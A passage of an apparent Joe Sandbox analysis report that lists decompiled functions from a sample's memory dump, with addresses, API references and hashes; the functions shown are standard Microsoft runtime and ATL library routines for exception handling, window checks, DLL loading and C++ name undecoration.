                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ItemWindow
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 1669990519-3692021841
                      • Opcode ID: 4a6eb8dccfb49377e1d4e9d507de30c2683c6dfbca1df7eb8c57cf7d916b49d7
                      • Instruction ID: 43ce43b04f980f45f8ef5e328488adb4fad72e7cb6c44afcc5540876ba4be5b9
                      • Opcode Fuzzy Hash: 4a6eb8dccfb49377e1d4e9d507de30c2683c6dfbca1df7eb8c57cf7d916b49d7
                      • Instruction Fuzzy Hash: BA01F276E81218BBCB10EB58EC43F9E73689F89745F004156F909A7341E671AD4087D1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0095B360 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0095B360(intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				void* _t29;
				void* _t32;
				void* _t39;
				void* _t40;

				_t33 =  *_a4;
				_v12 =  *_a4;
				_v8 =  *_v12;
				if(_v8 == 0xe0434352 || _v8 == 0xe0434f4d) {
					L5:
					if( *((intOrPtr*)(E0095C670(_t32, _t33, _t39, _t40) + 0x18)) > 0) {
						_v16 = E0095C670(_t32, _t33, _t39, _t40) + 0x18;
						 *_v16 =  *_v16 - 1;
					}
					return 0;
				} else {
					if(_v8 == 0xe06d7363) {
						 *((intOrPtr*)(E0095C670(_t32, _t33, _t39, _t40) + 0x10)) = _v12;
						_v20 =  *((intOrPtr*)(_a4 + 4));
						_t29 = E0095C670(_t32, _v12, _t39, _t40);
						_t33 = _v20;
						 *((intOrPtr*)(_t29 + 0x14)) = _v20;
						E00999BF0(_v20);
						goto L5;
					}
					return 0;
				}
			}











                      0x0095b369
                      0x0095b36b
                      0x0095b373
                      0x0095b37d
                      0x0095b3b7
                      0x0095b3c0
                      0x0095b3ca
                      0x0095b3d8
                      0x0095b3d8
                      0x00000000
                      0x0095b388
                      0x0095b38f
                      0x0095b39b
                      0x0095b3a4
                      0x0095b3a7
                      0x0095b3ac
                      0x0095b3af
                      0x0095b3b2
                      0x00000000
                      0x0095b3b2
                      0x00000000
                      0x0095b3de

                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095B393
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095B3A7
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095B3B7
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095B3C2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd
                      • String ID: csm
                      • API String ID: 984050374-1018135373
                      • Opcode ID: 6c6199df7b7983c945f9fd93a61295846627afb9c89947af622b240221aa0eaa
                      • Instruction ID: e1e1f56c2082a5cc2eaa99571cb5f2d288dd7726da95b1e65b68a3be9cc34a28
                      • Opcode Fuzzy Hash: 6c6199df7b7983c945f9fd93a61295846627afb9c89947af622b240221aa0eaa
                      • Instruction Fuzzy Hash: 54111B78D02209DFCB14EFA9C14555DBBB0FF49301F1085A9DC05A7311D778DA44DB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0094C410 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 42COMMON
                      Download Yara Rule
                      C-Code - Quality: 77%
                      			E0094C410(struct HWND__** __ecx, void* __esi, int _a4) {
				struct HWND__** _v8;
				void* _t8;
				void* _t13;
				void* _t22;
				void* _t23;

				_push(__ecx);
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t8 = E009D1520(IsWindow( *_v8), _t23 - _t23);
				_t26 = _t8;
				if(_t8 == 0) {
					_t13 = L00994930(_t26, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x508, 0, "%ls", L"::IsWindow(m_hWnd)");
					_t23 = _t23 + 0x18;
					if(_t13 == 1) {
						asm("int3");
					}
				}
				return E009D1520(E009D1520(ShowWindow( *_v8, _a4), _t23 - _t23), _t22 - _t23 + 4);
			}








                      0x0094c413
                      0x0094c415
                      0x0094c41c
                      0x0094c42f
                      0x0094c434
                      0x0094c436
                      0x0094c450
                      0x0094c455
                      0x0094c45b
                      0x0094c45d
                      0x0094c45d
                      0x0094c45b
                      0x0094c485

                      APIs
                      Strings
                      • %ls, xrefs: 0094C43D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 0094C449
                      • ::IsWindow(m_hWnd), xrefs: 0094C438
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Window$Show
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 990937876-3692021841
                      • Opcode ID: 5e7d01a44d1072706e94137cd43692dfa4f71e3adc29b382da244b7a57b4077b
                      • Instruction ID: 6ceea2bc79fd7af420e05405faa854868ed493af4f12cee5efd1fc13e280e689
                      • Opcode Fuzzy Hash: 5e7d01a44d1072706e94137cd43692dfa4f71e3adc29b382da244b7a57b4077b
                      • Instruction Fuzzy Hash: ACF0F472E812087BC710E798AC43F6E73689B88700F104255FA05A3341E575AE0056D6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00954DE0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 41COMMON
                      Download Yara Rule
                      C-Code - Quality: 77%
                      			E00954DE0(struct HWND__** __ecx, void* __esi) {
				struct HWND__** _v8;
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;

				_push(__ecx);
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t7 = E009D1520(IsWindow( *_v8), _t21 - _t21);
				_t24 = _t7;
				if(_t7 == 0) {
					_t12 = L00994930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x35f, 0, "%ls", L"::IsWindow(m_hWnd)");
					_t21 = _t21 + 0x18;
					if(_t12 == 1) {
						asm("int3");
					}
				}
				return E009D1520(E009D1520(GetWindowLongA( *_v8, 0xfffffff0), _t21 - _t21), _t20 - _t21 + 4);
			}








                      0x00954de3
                      0x00954de5
                      0x00954dec
                      0x00954dff
                      0x00954e04
                      0x00954e06
                      0x00954e20
                      0x00954e25
                      0x00954e2b
                      0x00954e2d
                      0x00954e2d
                      0x00954e2b
                      0x00954e53

                      APIs
                      Strings
                      • %ls, xrefs: 00954E0D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00954E19
                      • ::IsWindow(m_hWnd), xrefs: 00954E08
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Window$Long
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 847901565-3692021841
                      • Opcode ID: f2ee7fa46c23a8114639c2c3d048f3ecbe1e41f2cd707f7a688ba91bb89c2e86
                      • Instruction ID: aeab49ad66918572267c9b2db63df3e7f312b55dadbf0a9554d218445090a281
                      • Opcode Fuzzy Hash: f2ee7fa46c23a8114639c2c3d048f3ecbe1e41f2cd707f7a688ba91bb89c2e86
                      • Instruction Fuzzy Hash: 20F0F632E852287BC720E79CAC43F5E73689F85715F100395FE09A7391E5659D4047C6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00954660 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 40windowCOMMON
                      Download Yara Rule
                      C-Code - Quality: 77%
                      			E00954660(struct HWND__** __ecx, void* __esi) {
				struct HWND__** _v8;
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;

				_push(__ecx);
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t7 = E009D1520(IsWindow( *_v8), _t21 - _t21);
				_t24 = _t7;
				if(_t7 == 0) {
					_t12 = L00994930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x50e, 0, "%ls", L"::IsWindow(m_hWnd)");
					_t21 = _t21 + 0x18;
					if(_t12 == 1) {
						asm("int3");
					}
				}
				return E009D1520(E009D1520(IsWindowVisible( *_v8), _t21 - _t21), _t20 - _t21 + 4);
			}








                      0x00954663
                      0x00954665
                      0x0095466c
                      0x0095467f
                      0x00954684
                      0x00954686
                      0x009546a0
                      0x009546a5
                      0x009546ab
                      0x009546ad
                      0x009546ad
                      0x009546ab
                      0x009546d1

                      APIs
                      Strings
                      • %ls, xrefs: 0095468D
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00954699
                      • ::IsWindow(m_hWnd), xrefs: 00954688
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Window$Visible
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 3657826678-3692021841
                      • Opcode ID: 3b22ef87c556f916ca3880c8419a167cb92bb9cc55cfffadd1c01481f1311527
                      • Instruction ID: 305040e2db7d5c2d3f0b00a9294fd801fd402b9a2c58c6165cdd9451e8833116
                      • Opcode Fuzzy Hash: 3b22ef87c556f916ca3880c8419a167cb92bb9cc55cfffadd1c01481f1311527
                      • Instruction Fuzzy Hash: 03F0F632E95318BBC720E79CEC43F5E73689F85705F100295F909A3341E965DD4047D6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0096B220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34libraryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0096B220(void* __ecx, WCHAR* _a4) {
				struct HINSTANCE__* _v8;

				_v8 = LoadLibraryExW(_a4, 0, 0x800);
				if(_v8 == 0) {
					if(GetLastError() != 0x57 || E009A2BC0(_a4, L"api-ms-", 7) == 0) {
						return 0;
					} else {
						return LoadLibraryExW(_a4, 0, 0);
					}
				}
				return _v8;
			}




                      0x0096b235
                      0x0096b23c
                      0x0096b24c
                      0x00000000
                      0x0096b265
                      0x00000000
                      0x0096b26d
                      0x0096b24c
                      0x00000000

                      APIs
                      • LoadLibraryExW.KERNEL32(0096B127,00000000,00000800,?,?,0096B127,00000000), ref: 0096B22F
                      • GetLastError.KERNEL32(?,?,0096B127), ref: 0096B243
                      • _wcsncmp.LIBCMTD ref: 0096B259
                      • LoadLibraryExW.KERNEL32(0096B127,00000000,00000000,?,0096B127), ref: 0096B26D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: LibraryLoad$ErrorLast_wcsncmp
                      • String ID: api-ms-
                      • API String ID: 4169583555-2084034818
                      • Opcode ID: 1d0e0b704105e932ab65fee4b56e2a3dbb24afc3a37d42c06aeb74d2f91592ef
                      • Instruction ID: 0d4ba8ef713343e3b472f1d42c9664763baaf3f06fc04cae5f6d637fbd2980a9
                      • Opcode Fuzzy Hash: 1d0e0b704105e932ab65fee4b56e2a3dbb24afc3a37d42c06aeb74d2f91592ef
                      • Instruction Fuzzy Hash: 67F0E231A88204FBDB109BA0CC1ABAD37B8EB14700F204424FA04EA180FB71EE809790
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009637C0 Relevance: 7.7, APIs: 5, Instructions: 159COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009637C0(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v24;
				signed int _v28;
				char _v32;
				char* _v36;
				char _v40;
				char* _v44;
				char _v48;
				char* _v52;
				char _v56;
				char* _v60;
				char _v64;
				char* _v68;
				char _v72;
				char* _v76;
				char _v80;
				char* _v84;
				char _v88;
				char* _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				intOrPtr _v108;
				char _v112;
				char* _t64;
				intOrPtr _t82;
				char* _t89;
				signed int _t92;

				_t64 =  *0xb30640; // 0x0
				if( *_t64 == 0) {
					E0095F350(_a4, 1);
					return _a4;
				}
				_t89 =  *0xb30640; // 0x0
				_v16 =  *_t89 - 0x41;
				_t82 =  *0xb30640; // 0x0
				 *0xb30640 = _t82 + 1;
				_v8 = _v16;
				if(_v8 > 0x16) {
					E0095F350(_a4, 2);
					return _a4;
				}
				E0095F350( &_v24, 2);
				if(E00962230( &_v24) == 0) {
					L16:
					E0095F240(_a4,  &_v24);
					return _a4;
				}
				_v12 = _v8 & 0xfffffffe;
				if(_v12 > 0x16) {
					goto L16;
				}
				_t10 = _v12 + 0x963a00; // 0xcccccc0a
				_t92 =  *_t10 & 0x000000ff;
				switch( *((intOrPtr*)(_t92 * 4 +  &M009639D0))) {
					case 0:
						_v32 = E00960130(_t87, 1);
						_v28 = _t92;
						E0095F7E0( &_v24,  &_v32);
						goto L16;
					case 1:
						_v40 = E00960130(__ecx, 2);
						_v36 = __edx;
						__ecx =  &_v40;
						__ecx =  &_v24;
						__eax = E0095F7E0(__ecx,  &_v40);
						goto L16;
					case 2:
						_v48 = E00960130(__ecx, 4);
						_v44 = __edx;
						__edx =  &_v48;
						__ecx =  &_v24;
						__eax = E0095F7E0(__ecx,  &_v48);
						goto L16;
					case 3:
						_v56 = E00960130(__ecx, 3);
						_v52 = __edx;
						__eax =  &_v56;
						__ecx =  &_v24;
						__eax = E0095F7E0(__ecx,  &_v56);
						goto L16;
					case 4:
						_v64 = E00960130(__ecx, 5);
						_v60 = __edx;
						__ecx =  &_v64;
						__ecx =  &_v24;
						__eax = E0095F7E0(__ecx,  &_v64);
						goto L16;
					case 5:
						_v80 = E00960130(__ecx, 7);
						_v76 = __edx;
						__eax =  &_v80;
						__ecx =  &_v24;
						__eax = E0095F7E0(__ecx,  &_v80);
						goto L16;
					case 6:
						_v88 = E00960130(__ecx, 8);
						_v84 = __edx;
						__ecx =  &_v88;
						__ecx =  &_v24;
						__eax = E0095F7E0(__ecx,  &_v88);
						goto L16;
					case 7:
						_v72 = E00960130(__ecx, 6);
						_v68 = __edx;
						__edx =  &_v72;
						__ecx =  &_v24;
						__eax = E0095F7E0(__ecx,  &_v72);
						goto L16;
					case 8:
						_v96 = E00960130(__ecx, 9);
						_v92 = __edx;
						__edx =  &_v96;
						__ecx =  &_v24;
						__eax = E0095F7E0(__ecx,  &_v96);
						goto L16;
					case 9:
						_v104 = E00960130(__ecx, 0xa);
						_v100 = __edx;
						__eax =  &_v104;
						__ecx =  &_v24;
						__eax = E0095F7E0(__ecx,  &_v104);
						goto L16;
					case 0xa:
						_v112 = E00960130(__ecx, 0xb);
						_v108 = __edx;
						__ecx =  &_v112;
						__ecx =  &_v24;
						__eax = E0095F7E0(__ecx,  &_v112);
						goto L16;
					case 0xb:
						goto L16;
				}
			}

































                      0x009637c6
                      0x009637d0
                      0x009639c2
                      0x00000000
                      0x009639c7
                      0x009637d6
                      0x009637e2
                      0x009637e5
                      0x009637ee
                      0x009637f7
                      0x009637fe
                      0x009639b1
                      0x00000000
                      0x009639b6
                      0x00963809
                      0x00963815
                      0x00963999
                      0x009639a0
                      0x00000000
                      0x009639a5
                      0x00963821
                      0x00963828
                      0x00000000
                      0x00000000
                      0x00963831
                      0x00963831
                      0x00963838
                      0x00000000
                      0x00963849
                      0x0096384c
                      0x00963856
                      0x00000000
                      0x00000000
                      0x0096386a
                      0x0096386d
                      0x00963870
                      0x00963874
                      0x00963877
                      0x00000000
                      0x00000000
                      0x0096388b
                      0x0096388e
                      0x00963891
                      0x00963895
                      0x00963898
                      0x00000000
                      0x00000000
                      0x009638ac
                      0x009638af
                      0x009638b2
                      0x009638b6
                      0x009638b9
                      0x00000000
                      0x00000000
                      0x009638cd
                      0x009638d0
                      0x009638d3
                      0x009638d7
                      0x009638da
                      0x00000000
                      0x00000000
                      0x0096390f
                      0x00963912
                      0x00963915
                      0x00963919
                      0x0096391c
                      0x00000000
                      0x00000000
                      0x0096392d
                      0x00963930
                      0x00963933
                      0x00963937
                      0x0096393a
                      0x00000000
                      0x00000000
                      0x009638ee
                      0x009638f1
                      0x009638f4
                      0x009638f8
                      0x009638fb
                      0x00000000
                      0x00000000
                      0x0096394b
                      0x0096394e
                      0x00963951
                      0x00963955
                      0x00963958
                      0x00000000
                      0x00000000
                      0x00963969
                      0x0096396c
                      0x0096396f
                      0x00963973
                      0x00963976
                      0x00000000
                      0x00000000
                      0x00963987
                      0x0096398a
                      0x0096398d
                      0x00963991
                      0x00963994
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • UnDecorator::doMSKeywords.LIBCMTD ref: 0096380E
                      • Mailbox.LIBCMTD ref: 009639A0
                      • DName::DName.LIBVCRUNTIMED ref: 00963809
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::DName.LIBVCRUNTIMED ref: 009639B1
                      • DName::DName.LIBVCRUNTIMED ref: 009639C2
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$Name::$Decorator::doKeywordsMailboxNode::makeStatus
                      • String ID:
                      • API String ID: 2417761376-0
                      • Opcode ID: b6f0463b656c11f35c1b0f535d629a3828c40dfd5e5ae1d3f03c2d5b67b95dbe
                      • Instruction ID: fc7c518122a8d7d0c1b93fdf4d8fef222f3ce679c628fa9c82eed2bdf1503eea
                      • Opcode Fuzzy Hash: b6f0463b656c11f35c1b0f535d629a3828c40dfd5e5ae1d3f03c2d5b67b95dbe
                      • Instruction Fuzzy Hash: 6F51F3F5D04208DFDB09EFE4D952AEE7BB4AF94301F14812AE51A6B281EA745B04CF52
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009699E0 Relevance: 7.6, APIs: 5, Instructions: 116COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E009699E0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				signed char _v5;
				char _v6;
				void* _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v32;
				char _v40;
				char _v48;
				char* _t97;
				intOrPtr _t98;

				_v24 = __ecx;
				E0095F3F0( &_v32);
				E0096A860(__ebx, __edi, __esi,  &_v40);
				if(E0096AB70( &_v40) != 3) {
					if(E0096AB70( &_v40) == 2) {
						L5:
						_v5 = 0;
						_push(_v5 & 0x000000ff);
						_t98 =  *0xb30644; // 0x0
						E0095F820( &_v32, E0095E5F0( &_v48, _t98));
						L7:
						if(_a4 == 0) {
							_a8 = E0096A700( &_v32) + 1;
							_v20 = E0095F7A0(_a8, 0xb3065c, 1);
							_a4 = _v20;
						}
						if(_a4 == 0) {
							L20:
							return _a4;
						} else {
							E00967D80( &_v32, _a4, _a8);
							_v12 = _a4;
							_v16 = _v12;
							while( *_v12 != 0) {
								if( *_v12 != 0x20) {
									_v6 =  *_v12;
									_v12 = _v12 + 1;
									 *_v16 = _v6;
									_v16 = _v16 + 1;
									L18:
									continue;
								}
								_v12 = _v12 + 1;
								 *_v16 = 0x20;
								_v16 = _v16 + 1;
								while( *_v12 == 0x20) {
									_v12 = _v12 + 1;
								}
								goto L18;
							}
							 *_v16 =  *_v12;
							goto L20;
						}
					}
					if(E00962290() != 0) {
						L6:
						E0095F820( &_v32,  &_v40);
						goto L7;
					}
					_t97 =  *0xb30640; // 0x0
					if( *_t97 == 0) {
						goto L6;
					}
					goto L5;
				}
				return 0;
			}














                      0x009699e6
                      0x009699ec
                      0x009699f5
                      0x00969a08
                      0x00969a1e
                      0x00969a36
                      0x00969a38
                      0x00969a3f
                      0x00969a40
                      0x00969a53
                      0x00969a66
                      0x00969a6a
                      0x00969a77
                      0x00969a8d
                      0x00969a93
                      0x00969a93
                      0x00969a9a
                      0x00969b2f
                      0x00000000
                      0x00969aa0
                      0x00969aab
                      0x00969ab3
                      0x00969ab9
                      0x00969abc
                      0x00969acf
                      0x00969b06
                      0x00969b0f
                      0x00969b18
                      0x00969b20
                      0x00969b23
                      0x00000000
                      0x00969b23
                      0x00969ad7
                      0x00969add
                      0x00969ae6
                      0x00969ae9
                      0x00969afa
                      0x00969afa
                      0x00000000
                      0x00969aff
                      0x00969b2d
                      0x00000000
                      0x00969b2d
                      0x00969a9a
                      0x00969a27
                      0x00969a5a
                      0x00969a61
                      0x00000000
                      0x00969a61
                      0x00969a29
                      0x00969a34
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00969a34
                      0x00000000

                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 009699EC
                        • Part of subcall function 0096A860: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0096A869
                        • Part of subcall function 0096A860: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 0096A8C6
                        • Part of subcall function 0096A860: operator+.LIBVCRUNTIMED ref: 0096A8D7
                        • Part of subcall function 0096A860: Mailbox.LIBCMTD ref: 0096A8E3
                        • Part of subcall function 0096A860: Mailbox.LIBCMTD ref: 0096A9D5
                      • Mailbox.LIBCMTD ref: 00969A53
                      • DName::length.LIBVCRUNTIMED ref: 00969A6F
                      • DName::getString.LIBCMTD ref: 00969AAB
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Mailbox$Iterator_baseIterator_base::_std::_$DecoratedDecorator::getNameName::getName::lengthStringoperator+
                      • String ID:
                      • API String ID: 245642696-0
